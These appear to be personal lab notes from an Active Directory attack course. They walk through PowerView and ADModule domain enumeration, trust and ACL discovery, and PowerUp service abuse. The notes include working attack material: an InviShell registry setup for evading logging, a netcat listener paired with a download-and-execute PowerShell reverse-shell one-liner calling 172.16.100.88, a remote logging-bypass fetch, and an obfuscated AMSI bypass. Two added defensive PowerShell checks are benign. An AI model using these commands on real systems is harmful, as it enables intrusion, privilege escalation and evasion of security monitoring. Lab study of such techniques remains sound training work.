Windows AD Exploitation

Setup InviShell

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat (contents of the batch file):
set COR_ENABLE_PROFILING=1
set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
powershell
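Invisi-Shell works because the CLR loads whatever DLL COR_PROFILER's CLSID resolves to into every .NET process, PowerShell included, and a per-user CLSID under HKCU is enough. As an added example for the defensive side (not from the original notes or the Invisi-Shell project; the function name Get-ClrProfilerHooks is my own), this check inventories the profiler settings in each environment scope and resolves the registered DLL:

```powershell
function Get-ClrProfilerHooks {
    # Assumed name for this added check. Reports CLR profiler settings in each
    # environment scope and resolves COR_PROFILER's CLSID to its InprocServer32 DLL,
    # the chain RunWithRegistryNonAdmin.bat sets up under HKCU.
    [CmdletBinding()]
    param()

    foreach ($scope in 'Process', 'User', 'Machine') {
        $enabled = [Environment]::GetEnvironmentVariable('COR_ENABLE_PROFILING', $scope)
        $clsid   = [Environment]::GetEnvironmentVariable('COR_PROFILER', $scope)
        # .NET 4+ also honours COR_PROFILER_PATH, which needs no registry entry at all
        $direct  = [Environment]::GetEnvironmentVariable('COR_PROFILER_PATH', $scope)
        if (-not ($enabled -eq '1' -or $clsid -or $direct)) { continue }

        $dll  = $direct
        $hive = $null
        if (-not $dll -and $clsid) {
            # Per-user COM registration in HKCU takes precedence over HKLM, which is
            # why a standard user can plant the profiler; look there first.
            foreach ($h in 'HKCU', 'HKLM') {
                $key = "${h}:\Software\Classes\CLSID\$clsid\InprocServer32"
                if (Test-Path -LiteralPath $key) {
                    $dll  = (Get-ItemProperty -LiteralPath $key).'(default)'
                    $hive = $h
                    break
                }
            }
        }

        [pscustomobject]@{
            Scope       = $scope
            Enabled     = $enabled
            Clsid       = $clsid
            RegHive     = $hive
            ProfilerDll = $dll
            # A profiler loaded from outside %SystemRoot% or Program Files warrants review
            Suspicious  = [bool]($dll -and
                                 $dll -notlike "$env:SystemRoot\*" -and
                                 $dll -notlike "$env:ProgramFiles\*")
        }
    }
}

Get-ClrProfilerHooks | Format-Table -AutoSize
```

Run it from a plain PowerShell session on the host under review; a row with Suspicious set to True and a DLL in a user-writable directory is the Invisi-Shell pattern.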

Load PowerView:

. .\PowerView.ps1

Grab DomainUser Info

Get-DomainUser

To list a specific property of all the users, use the Select-Object cmdlet (or its alias select). For example, to list only the samaccountname, run the following command:

Get-DomainUser | select -ExpandProperty samaccountname

To enumerate member computers in the domain we can use Get-DomainComputer:

Get-DomainComputer | select -ExpandProperty dnshostname

To see details of the Domain Admins group:

Get-DomainGroup -Identity "Domain Admins"

Enumerate members:

Get-DomainGroupMember -Identity "Domain Admins"

Enumerate Members of Enterprise Admins in a specified domain

Get-DomainGroupMember -Identity "Enterprise Admins" -Domain <DOMAIN>

Using the Active Directory module (ADModule). Let's import the ADModule. Remember to use it from a different PowerShell session started with Invisi-Shell: if PowerView and the ADModule are loaded in the same PowerShell session, some functions may not work:

Import-Module 'C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll'
Import-Module 'C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1'

Enumerate all the users in the current domain using the ADModule:

Get-ADUser -Filter *

Let's list samaccountname and description for the users. Note that we retrieve all the properties first with the -Properties parameter, then select the two we want:

Get-ADUser -Filter * -Properties * | select Samaccountname,Description

Enumerate all the computers in the current domain:

Get-ADComputer -Filter *

Enumerate Domain Administrators using the Active Directory Module:

Get-ADGroupMember -Identity 'Domain Admins'
Get-ADGroupMember -Identity 'Enterprise Admins' -Server moneycorp.local

To list all the OUs, run the below command after bypassing AMSI and loading PowerView:

Get-DomainOU
Get-DomainOU | select -ExpandProperty name

Now, to list all the computers in the StudentMachines OU:

(Get-DomainOU -Identity StudentMachines).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

List all the GPOs:

Get-DomainGPO

To find the GPO applied to an OU, read the OU's gplink attribute and pass the GPO GUID it contains to Get-DomainGPO. Both commands can also be combined into a single one, taking advantage of the fixed length of GUIDs:

(Get-DomainOU -Identity StudentMachines).gplink
<SNIP Output>

Get-DomainGPO -Identity '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}'

Get-DomainGPO -Identity (Get-DomainOU -Identity StudentMachines).gplink.substring(11,(Get-DomainOU -Identity StudentMachines).gplink.length-72)
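The substring arithmetic above breaks as soon as an OU has more than one link or a longer DN. As an added example (not from the original notes or PowerView; the function name Get-LinkedGpo is my own), this parses the gPLink format with a regex and returns each link as an object, assuming PowerView's Get-DomainOU and Get-DomainGPO are loaded:

```powershell
function Get-LinkedGpo {
    # Assumed name for this added helper. gPLink is a concatenation of entries of
    # the form [LDAP://cn={GUID},cn=policies,cn=system,DC=...;FLAGS] where FLAGS
    # bit 0 means the link is disabled and bit 1 means it is enforced.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$OUName,
        [switch]$Resolve   # also look up each GPO's display name via Get-DomainGPO
    )

    $gplink = (Get-DomainOU -Identity $OUName).gplink
    if (-not $gplink) { return }

    $pattern  = '(?i)\[LDAP://cn=(\{[0-9A-F-]{36}\}),([^;]+);(\d+)\]'
    $position = 0
    foreach ($m in [regex]::Matches($gplink, $pattern)) {
        $position++
        $flags = [int]$m.Groups[3].Value
        $link = [pscustomobject]@{
            OU         = $OUName
            Position   = $position            # order of appearance in the attribute
            GpoGuid    = $m.Groups[1].Value
            PoliciesDn = $m.Groups[2].Value
            Disabled   = [bool]($flags -band 1)
            Enforced   = [bool]($flags -band 2)
            GpoName    = $null
        }
        if ($Resolve) {
            $link.GpoName = (Get-DomainGPO -Identity $link.GpoGuid).displayname
        }
        $link
    }
}

Get-LinkedGpo -OUName StudentMachines -Resolve | Format-Table -AutoSize
```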
Enumerate the ACLs on the Domain Admins group:

Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "student488"}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} | ?{$_.ObjectDN -match "control488 user"}

Enumerate the domains in the current forest, then the trusts of each domain (filtering for SID-filtered trusts), and the trusts of another forest:

Get-ForestDomain -Verbose

Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}

ADModule commands:

(Get-ADForest).Domains

Get-ADTrust -Filter *

Get-ADForest | %{Get-ADTrust -Filter *}

(Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}

Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)'

Get-ADTrust -Filter * -Server eurocorp.local

Using PowerUp.ps1:

Get-ServiceUnquoted

Get-ModifiableServiceFile -Verbose

Get-ModifiableService

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student488'

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Get-ModifiableService
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student488'

Execute reverse shell (listener first, then the PowerShell one-liner):

nc64.exe -nvlp PORT

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.88/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 172.16.100.88 -Port 443

iex (iwr http://172.16.100.88:8000/sbloggingbypass.txt -UseBasicParsing)

AMSI Bypass

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; 
( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Run commands on a remote machine over PowerShell remoting:

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt